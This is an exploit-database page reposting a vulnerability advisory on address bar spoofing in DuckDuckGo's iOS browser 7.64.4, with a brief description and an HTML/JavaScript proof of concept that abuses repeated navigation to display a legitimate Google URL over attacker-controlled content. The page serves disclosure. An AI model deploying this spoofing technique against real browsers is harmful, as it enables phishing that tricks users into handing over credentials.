[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

DuckDuckGo 7.64.4 Address Bar Spoofing Vulnerability

Author
Rafay Baloch
Risk
[
Security Risk Medium
]
0day-ID
0day-ID-37095
Category
web applications
Date add
04-12-2021
Platform
multiple
#Vulnerability: Address Bar Spoofing Vulnerability
Product: DuckDuckGo
Discovered by: Rafay Baloch and Muhammad Samak
#Version: 7.64.4
#Impact: Moderate
#Company: Cyber Citadel
#Website: https://www.cybercitadel.com


*Description*

DuckDuckGo browser for iOS was prone to an "Address Bar Spoofing"
vulnerability due to mishandling of javaScript's window.open function
which is used to open a secondary browser window. This could be exploited
by tricking the users into supplying senstive information such as
username/passwords etc due to the fact that the address bar would display a
legitimate URL, however it would be hosted on the attacker's page.



*Proof of Concept (POC)*

Following is the POC that could be used to reproduce the issue:

<script>
    function spoof(){
    location="https://www.google.com/csi?random="+Math.random();
    document.body.innerHTML='This is not Google!';("This is not google.com
</h1>");}
</script>
<input type="button" value="Run"
onclick="setInterval("spoof()",20);"/>



*Impact*

The issue could be abused to carry out more effective phishing attacks
against it's users.

#  0day.today [2024-06-15]  #